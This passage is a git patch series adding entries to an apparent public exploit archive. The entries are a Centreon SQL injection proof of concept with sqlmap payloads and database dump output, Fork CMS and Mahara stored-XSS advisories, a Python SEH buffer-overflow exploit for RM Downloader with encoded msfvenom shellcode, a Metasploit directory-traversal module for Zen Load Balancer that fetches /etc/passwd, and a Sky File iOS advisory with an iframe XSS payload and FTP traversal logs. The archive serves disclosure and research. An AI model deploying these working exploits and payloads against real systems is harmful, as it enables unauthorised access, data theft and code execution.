infrastructure systems and network performance monitoring. + Downloaded by hundreds and thousands of IT professionals worldwide. + The analysis discovered a time-based blind SQL + injection vulnerability in the tracker functionality of + Centreon Monitoring software. A malicious user can inject arbitrary + SQL commands to the application. The vulnerability lies in the project tracker + service search functionality; depending on project visibility successful + exploitation may require user authentication. A successful attack + can read, modify or delete data from the database or execute arbitrary commands on the underlying system. + +[VULNERABLE VERSIONS] + + The following version of the Centreon Monitoring was affected by the + vulnerability; previous versions may be vulnerable as well: + - Centreon version 19.10.5 + + +[Proof of Concept] + + http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23 + + + [Payloads] + + Parameter: svc_id (GET) + Type: boolean-based blind + Title: OR boolean-based blind - WHERE or HAVING clause (NOT) + Payload: hid=15&svc_id=1 OR NOT 5782=5782 + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy) + + Type: UNION query + Title: MySQL UNION query (NULL) - 5 columns + Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL# +--- +[12:24:35] [INFO] testing MySQL +[12:24:35] [INFO] confirming MySQL +[12:24:35] [INFO] the back-end DBMS is MySQL +[12:24:35] [INFO] fetching banner +web server operating system: Linux Red Hat +web application technology: Apache 2.4.34, PHP 7.2.24 +back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) +banner: '10.1.38-MariaDB' +[12:24:35] [INFO] fetching database names +[12:24:35] [INFO] starting 4 threads +[12:24:35] [INFO] resumed: 'centreon' +[12:24:35] [INFO] resumed: 'test' +[12:24:35] [INFO] resumed: 'centreon_storage' +[12:24:35] [INFO] resumed: 'information_schema' +available databases [4]: +[*] centreon +[*] centreon_storage +[*] information_schema +[*] test \ No newline at end of file diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt new file mode 100644 index 000000000..64d991ee6 --- /dev/null +++ b/exploits/php/webapps/48348.txt @@ -0,0 +1,491 @@ +# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.fork-cms.com/download +# Software Link: https://github.com/forkcms/forkcms/pull/3073 +# CVE: N/A + +Document Title: +=============== +Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2208 + +ID (3073): https://github.com/forkcms/forkcms/pull/3073 + + +Release Date: +============= +2020-04-17 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2208 + + +Common Vulnerability Scoring System: +==================================== +5.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Fork is an easy to use open source CMS using Symfony Components. Fork +CMS is dedicated to creating a user friendly environment +to build, monitor and +update your website. We take great pride in being the Content Management +System of choice for beginners and professionals. + +(Copy of the Homepage: https://www.fork-cms.com & +https://www.fork-cms.com/download ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the official Fork CMS v5.8.0. + + +Affected Product(s): +==================== +ForkCMS +Product: Fork CMS v5.8.0 - Content Management System (Web-Application) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-17: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent input validation web vulnerabilities has been +discovered in the official Fork CMS v5.8.0 open-source web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent input validation web vulnerabilities are located in the +`Displayname` input field when using the `Add`, `Edit` or `Register` +mechanism that forwards the information into the `var` parameter. Remote +attackers and privileged application user accounts are able to +inject own malicious persistent script code as the users displayname by +usage of the registration module (/profiles/register). Privileged +users with access to the profile or users module are able to exploit the +issue by a simple inject. The displayname then becomes visible in +the Admin - Profiles Index on Preview, Edit User/Profile, Delete User +Interaction and User Index in Listing modules. the var parameter +does not encode or parse the exisiting injected content and executes it. +The request method to inject is POST and the attack vector of the +vulnerability is located on the application-side of the content +management system. The injection point is located in the registration form +and the add/edit user function. The execution point of the issue occurs +in the preview profile, edit user, user index listing and delete +user message context. + +Successful exploitation of the vulnerabilities results in session +hijacking, persistent phishing attacks, persistent external redirects to +malicious source and persistent manipulation of affected application +modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] Register +[+] Add User +[+] Edit User + +Vulnerable Input(s): +[+] Displayname + +Vulnerable Parameter(s): +[+] var + +Affected Module(s): +[+] Preview Profile +[+] Edit User +[+] User Index +[+] Delete User + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with low privileged user account and low user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information an steüs below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Open the fork cms web-application newst version +2. Move via sitemap or by link to the registration page +(/modules/profiles/register) +3. Inject your script code payload html/js to the Displayname input field +4. Register the account by pushing submit +5. Activate the link in the account registration email +Note: Now simple wait until the administrator / privileged user visits +the panel to execute the code on interaction or preview only +6. Successful reproduce of the persistent script code injection +vulnerability! + + +PoC: Vulnerable Source (User Index in Listing - +https://fork-cms.localhost:8080/private/en/users/index) + +test3"> +>" + + + + +Carpeta: +>" +>" + + +>" >" + +20/04/2020 + + +
+... ... + +
+ + +--- PoC Session Logs [POST] --- (Mygroup Ficheros) +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------98107146915324237501974151621 +Content-Length: 4879 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid=27 +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_edit_orientation=0& +files_filebrowser_edit_title=>" >"&files_filebrowser_edit_description=>" +>"&files_filebrowser_permission:member:view=on&files_filebrowser_permission:member:edit=on& +files_filebrowser_permission:member:republish=on&files_filebrowser_edit_license=&files_filebrowser_edit_license_other=& +files_filebrowser_edit_licensor=>" >"&files_filebrowser_edit_licensorurl=>" +>"&files_filebrowser_edit_allowcomments=on& +files_filebrowser_update[7191]=Guardar +cambios&sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1,1 +- +POST: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2- +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +- +Host: mahara_cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: multipart/form-data; +boundary=---------------------------126319663526561351602937008964 +Content-Length: 3721 +Origin: https://mahara_cms.localhost:8080 +Connection: keep-alive +Referer: +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php?group=27&folder=0&owner=group&ownerid= +Cookie: __cfduid=d6b9845d834027b2fd8a2223c5b559f2f1587303558; +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +folder=0&files_filebrowser_changefolder=&files_filebrowser_foldername=Página +principal&files_filebrowser_uploadnumber=1&files_filebrowser_upload=0&MAX_FILE_SIZE=1610608640&files_filebrowser_license=& +files_filebrowser_license_other=&files_filebrowser_licensor=&files_filebrowser_licensorurl=&files_filebrowser_resizeonuploaduserenable=on&userfile[]=&files_filebrowser_move=&files_filebrowser_moveto=&files_filebrowser_createfolder_name=&files_filebrowser_delete[7192]=&files_filebrowser_edit_orientation=0&files_filebrowser_edit_title=&files_filebrowser_edit_description=&files_filebrowser_edit_license=& +files_filebrowser_edit_license_other=&files_filebrowser_edit_licensor=&files_filebrowser_edit_licensorurl=& +sesskey=pFJC0a1dZWsy8rEA&pieform_files=&pieform_jssubmission=1,1 +- +GET: HTTP/2.0 200 OK +content-type: text/html; charset=UTF-8 +vary: Accept-Encoding +cache-control: no-store, no-cache, must-revalidate +set-cookie: +mahara=82af10d7e4d0a63e1395d579d0d2f4ea8fb16a18b0e97378b0473c0cf32d1b76; +path=/; secure; HttpOnly +content-encoding: br +X-Firefox-Spdy: h2 + + +Reference(s): +https://mahara_cms.localhost:8080/artefact/ +https://mahara_cms.localhost:8080/artefact/file/ +https://mahara_cms.localhost:8080/artefact/file/groupfiles.php + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/windows/local/48364.py b/exploits/windows/local/48364.py new file mode 100755 index 000000000..9cc992e06 --- /dev/null +++ b/exploits/windows/local/48364.py @@ -0,0 +1,69 @@ +# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH) +# Date: 2020-04-20 +# Author: Felipe Winsnes +# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe +# Version: 3.1.3.2.2010.06.13 +# Tested on: Windows 7 (x86) + +# Proof of Concept: +# 1.- Run the python script, it will create a new file "poc.txt" +# 2.- Copy the content of the new file 'poc.txt' to clipboard +# 3.- Open 'RmDownloader.exe' +# 4.- Go to 'Load' tab +# 5.- Paste clipboard in 'Load' parameter +# 6.- Click on button 'OK' +# 7.- Two messageboxes regarding the length of the payload will pop up, click OK +# 8.- Profit + +# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/ + +import struct + +# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread +# Payload size: 448 bytes + +buf = b"" +buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49" +buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" +buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" +buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" +buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b" +buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35" +buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c" +buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b" +buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35" +buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32" +buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79" +buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32" +buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32" +buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51" +buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30" +buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64" +buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b" +buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70" +buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71" +buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78" +buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70" +buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b" +buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56" +buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a" +buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e" +buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61" +buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62" +buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f" +buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31" +buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55" +buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b" +buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62" +buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70" +buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48" +buf += b"\x50\x65\x67\x70\x41\x41" + + +nseh = struct.pack(" Date: Fri, 24 Apr 2020 05:01:50 +0000 Subject: [PATCH 17/18] DB: 2020-04-24 8 changes to exploits/shellcodes User Management System 2.0 - Persistent Cross-Site Scripting User Management System 2.0 - Authentication Bypass Complaint Management System 4.2 - Persistent Cross-Site Scripting Complaint Management System 4.2 - Authentication Bypass Complaint Management System 4.2 - Cross-Site Request Forgery (Delete User) Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit) Sky File 2.1.0 iOS - Directory Traversal --- exploits/cgi/webapps/48373.rb | 83 +++++++++ exploits/ios/webapps/48375.txt | 322 +++++++++++++++++++++++++++++++++ exploits/php/webapps/47898.py | 31 ++-- exploits/php/webapps/48368.txt | 50 +++++ exploits/php/webapps/48369.txt | 49 +++++ exploits/php/webapps/48370.txt | 42 +++++ exploits/php/webapps/48371.txt | 40 ++++ exploits/php/webapps/48372.txt | 29 +++ files_exploits.csv | 7 + 9 files changed, 637 insertions(+), 16 deletions(-) create mode 100755 exploits/cgi/webapps/48373.rb create mode 100644 exploits/ios/webapps/48375.txt create mode 100644 exploits/php/webapps/48368.txt create mode 100644 exploits/php/webapps/48369.txt create mode 100644 exploits/php/webapps/48370.txt create mode 100644 exploits/php/webapps/48371.txt create mode 100644 exploits/php/webapps/48372.txt diff --git a/exploits/cgi/webapps/48373.rb b/exploits/cgi/webapps/48373.rb new file mode 100755 index 000000000..5e00bbf82 --- /dev/null +++ b/exploits/cgi/webapps/48373.rb @@ -0,0 +1,83 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Zen Load Balancer Directory Traversal", + 'Description' => %q{ + This module exploits a authenticated directory traversal +vulnerability in Zen Load + Balancer `v3.10.1`. The flaw exists in 'index.cgi' not +properly handling 'filelog=' + parameter which allows a malicious actor to load arbitrary file path. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Basim Alabdullah', # Vulnerability discovery + 'Dhiraj Mishra' # Metasploit module + ], + 'References' => + [ + ['EDB', '48308'] + ], + 'DisclosureDate' => "Apr 10 2020" + )) + + register_options( + [ + Opt::RPORT(444), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptInt.new('DEPTH', [true, 'The max traversal depth', 16]), + OptString.new('FILEPATH', [false, 'The name of the file to +download', '/etc/passwd']), + OptString.new('TARGETURI', [true, "The base URI path of the +ZenConsole install", '/']), + OptString.new('HttpUsername', [true, 'The username to use for +the HTTP server', 'admin']), + OptString.new('HttpPassword', [false, 'The password to use for +the HTTP server', 'admin']) + ]) + end + + def run_host(ip) + filename = datastore['FILEPATH'] + traversal = "../" * datastore['DEPTH'] + + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'index.cgi'), + 'vars_get'=> + { + 'id' => '2-3', + 'filelog' => "#{traversal}#{filename}", + 'nlines' => '100', + 'action' => 'See logs' + }, + 'authorization' => +basic_auth(datastore['HttpUsername'],datastore['HttpPassword']) + }, 25) + + unless res && res.code == 200 + print_error('Nothing was downloaded') + return + end + + print_good("#{peer} - Downloaded #{res.body.length} bytes") + path = store_loot( + 'zenload.http', + 'text/plain', + ip, + res.body, + filename + ) + print_good("File saved in: #{path}") + end +end \ No newline at end of file diff --git a/exploits/ios/webapps/48375.txt b/exploits/ios/webapps/48375.txt new file mode 100644 index 000000000..27dd13c8c --- /dev/null +++ b/exploits/ios/webapps/48375.txt @@ -0,0 +1,322 @@ +# Title: Sky File 2.1.0 iOS - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-21 +# Software Link: https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210 +# CVE: N/A + +Document Title: +=============== +Sky File v2.1.0 iOS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2207 + + +Common Vulnerability Scoring System: +==================================== +7.2 + + +Affected Product(s): +==================== +Jin Chen +Product: Sky File v2.1.0 - (iOS) Mobile Web Application +(https://apps.apple.com/us/app/sky-file-wireless-transfer/id1236452210) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-21: Public Disclosure (Vulnerability Laboratory) + + +Technical Details & Description: +================================ +1.1 +Multiple persistent cross site scripting vulnerabilities has been +discovered in the official Sky File v2.1.0 mobile ios web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The cross site vulnerability is located in the 'createFolder' module. +Remote attackers with access to the ui via wifi are able +to inject own malicious persistent script code to compromise the +web-application or user credentials. The request method to +inject is POST and the attack vector is located on the application-side. + +Successful exploitation of the vulnerability results session hijacking, +persistent phishing, persistent external redirects and +application-side manipulation of the web context of the affected and +connected device module. + + +1.2 +A directory traversal web vulnerability has been discovered in the +official Sky File v2.1.0 mobile ios web-application. +The web vulnerability allows an attacker to unauthorized change the path +or directory to access sensitive application data. + +The directory / path webvulnerability is located in the local ftp server +configuration and path validation with the insecure +access permissions. Normally the anonymous user account is only able to +move inside the main app folder but not above to the +web-server and root application files. In case of the issue remote +attackers are able to connect with anonymous user account +credentials to the wifi ftp server. After that the attacker can use a +misconfiguration in the ftp server of the app path to +transmit a `/null//` path commands after CWD and CDUP navigation via ftp +client. Thus allows the attacker to finally +unauthorized access the main root application path. + +Successful exploitation of the directory traversal vulnerability results +in unauthorized file system access and information disclosure. + + +Proof of Concept (PoC): +======================= +1.1 +The persistent script code inject vulnerability can be exploited by +remote attackers with wifi network access with low user interaction. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. + + +PoC: Payload +%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E + + +--- PoC Session Logs [POST] --- +Status: 200[OK] +POST http://localhost:10000/create +Mime Type[application/json] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Content-Type[application/x-www-form-urlencoded; charset=UTF-8] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:10000/] + Content-Length[140] + Connection[keep-alive] + POST-Daten: + +path[%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E%22%3E] + Response Header: + Cache-Control[no-cache] + Content-Length[2] + Content-Type[application/json] + Connection[Close] + Server[GCDWebUploader] +- +Status: 200[OK] +GET +http://localhost:10000/list?path=%2F%3E%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert(%22PWND%22)%3E%3E +Mime Type[application/json] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + Accept[application/json, text/javascript, */*; q=0.01] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + X-Requested-With[XMLHttpRequest] + Referer[http://localhost:10000/] + Connection[keep-alive] + Response Header: + Cache-Control[no-cache] + Content-Length[2] + Content-Type[application/json] + Connection[Close] + Server[GCDWebUploader] +- +Status: 200[OK] +GET http://localhost:10000/evil.source +Mime Type[application/x-unknown-content-type] + Request Header: + Host[localhost:10000] + User-Agent[Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) +Gecko/20100101 Firefox/52.0] + +Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8] + Accept-Language[de,en-US;q=0.7,en;q=0.3] + Accept-Encoding[gzip, deflate] + Referer[http://localhost:10000/] + Connection[keep-alive] + Upgrade-Insecure-Requests[1] + Response Header: + Server[GCDWebUploader] + Connection[Close] + + + +1.2 +The directory traversal web vulnerability can be exploited by remote +attackers with wifi network access without user interaction. +For security demonstration or to reproduce the web vulnerability follow +the provided information and steps below to continue. + + +Manual steps to reproduce ... +1. Open the ftp preview the visible folders +2. Jump back to the the following path +/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/ +3. Include the payload /(null)// and refresh via list command +4. You are now placed in an empty folder without permission to move +5. Add to /(null)/../ to the path and refresh the client +6. Path traversal successful to access the main app root path (./) that +is normally not accessable +7. Successful reproduce of the path traversal web vulnerability! + + +PoC: Payload +/(null)// to /(null)/../ + + +--- PoC Sessio Logs (FTP) --- +[21:52:40] [R] 221- Data traffic for this session was 0 bytes in 0 files +[21:52:40] [R] 221 Thank you for using the FTP service on localhost. +[21:52:40] [R] Logged off: 192.168.2.116 (Duration: 26 seconds) +[21:52:42] [R] Connecting to 192.168.2.116 -> IP=192.168.2.116 PORT=10001 +[21:52:42] [R] Connected to 192.168.2.116 +[21:52:42] [R] 220 iosFtp server ready. +[21:52:42] [R] USER anonymous +[21:52:42] [R] 331 Password required for (null) +[21:52:42] [R] PASS (hidden) +[21:52:42] [R] 230 User (null) logged in. +[21:52:42] [R] SYST +[21:52:42] [R] 215 UNIX Type: L8 Version: iosFtp 20080912 +[21:52:42] [R] FEAT +[21:52:42] [R] 211-Features supported +[21:52:42] [R] UTF8 +[21:52:42] [R] 211 End +[21:52:42] [R] OPTS UTF8 ON +[21:52:42] [R] 200 Type set Opts to UTF8. +[21:52:42] [R] PWD +[21:52:42] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" +is the current directory. +[21:52:42] [R] CWD /(null)/ +[21:52:42] [R] 550 CWD failed. +[21:52:42] [R] PWD +[21:52:42] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder/iFolder" +is the current directory. +[21:52:42] [R] PASV +[21:52:42] [R] 227 Entering Passive Mode (192,168,2,116,39,252) +[21:52:42] [R] Opening data connection IP: 192.168.2.116 PORT: 10236 +[21:52:42] [R] LIST -al +[21:52:42] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:52:42] [R] 226 Transfer complete. +[21:52:42] [R] List Complete: 149 bytes in 0,08 seconds (0,1 KB/s) +[21:52:43] [R] CDUP +[21:52:43] [R] 250 CDUP command successful. +[21:52:43] [R] PWD +[21:52:43] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents/myFolder" +is the current directory. +[21:52:43] [R] PASV +[21:52:43] [R] 227 Entering Passive Mode (192,168,2,116,87,51) +[21:52:43] [R] Opening data connection IP: 192.168.2.116 PORT: 22323 +[21:52:43] [R] LIST -al +[21:52:43] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:52:43] [R] 226 Transfer complete. +[21:52:43] [R] List Complete: 308 bytes in 0,10 seconds (0,3 KB/s) +[21:52:43] [R] CDUP +[21:52:44] [R] 250 CDUP command successful. +[21:52:44] [R] PWD +[21:52:44] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45/Documents" +is the current directory. +[21:52:44] [R] PASV +[21:52:44] [R] 227 Entering Passive Mode (192,168,2,116,151,51) +[21:52:44] [R] Opening data connection IP: 192.168.2.116 PORT: 38707 +[21:52:44] [R] LIST -al +[21:52:44] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:52:44] [R] 226 Transfer complete. +[21:52:44] [R] List Complete: 127 bytes in 0,08 seconds (0,1 KB/s) +[21:53:34] [R] CDUP +[21:53:34] [R] 250 CDUP command successful. +[21:53:34] [R] PWD +[21:53:34] [R] 257 +"/private/var/mobile/Containers/Data/Application/A9124FFE-16D8-413B-83B7-4018B69AEB45" +is the current directory. +[21:53:34] [R] PASV +[21:53:34] [R] 227 Entering Passive Mode (192,168,2,116,227,14) +[21:53:34] [R] Opening data connection IP: 192.168.2.116 PORT: 58126 +[21:53:34] [R] LIST -al +[21:53:34] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:53:34] [R] 226 Transfer complete. +[21:53:34] [R] List Complete: 312 bytes in 0,08 seconds (0,3 KB/s) +[21:53:35] [R] CDUP +[21:53:35] [R] 250 CDUP command successful. +[21:53:35] [R] PWD +[21:53:35] [R] 257 "(null)" is the current directory. +[21:53:35] [R] PASV +[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,159,14) +[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 40718 +[21:53:35] [R] LIST -al +[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:53:35] [R] 226 Transfer complete. +[21:53:35] [R] List Complete: 0 bytes in 0,07 seconds (0,0 KB/s) +[21:53:35] [R] PASV +[21:53:35] [R] 227 Entering Passive Mode (192,168,2,116,143,14) +[21:53:35] [R] Opening data connection IP: 192.168.2.116 PORT: 36622 +[21:53:35] [R] LIST -al +[21:53:35] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:53:35] [R] 226 Transfer complete. +[21:53:35] [R] List Complete: 0 bytes in 0,06 seconds (0,0 KB/s) +[21:53:36] [R] CDUP +[21:53:36] [R] 550 CDUP command failed. +[21:53:41] [R] CWD /etc +[21:53:41] [R] 250 CWD command successful. +[21:53:41] [R] PWD +[21:53:41] [R] 257 "(null)" is the current directory. +[21:53:48] [R] CDUP +[21:53:48] [R] 550 CDUP command failed. +[21:53:51] [R] CWD / +[21:53:51] [R] 250 CWD command successful. +[21:53:51] [R] PWD +[21:53:51] [R] 257 "/" is the current directory. +[21:53:51] [R] PASV +[21:53:51] [R] 227 Entering Passive Mode (192,168,2,116,221,173) +[21:53:51] [R] Opening data connection IP: 192.168.2.116 PORT: 56749 +[21:53:51] [R] LIST -al +[21:53:51] [R] 150 Opening ASCII mode data connection for '/bin/ls'. +[21:53:51] [R] 226 Transfer complete. +[21:53:51] [R] List Complete: 741 bytes in 0,10 seconds (0,7 KB/s) +[21:54:02] [R] TYPE I +[21:54:02] [R] 200 Type set to I. + +Listing Path ./root +- Applications +- bin +- cores +- developer +- Library +- private +- sbin +- System +- usr +- etc +- var +- tmp + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. 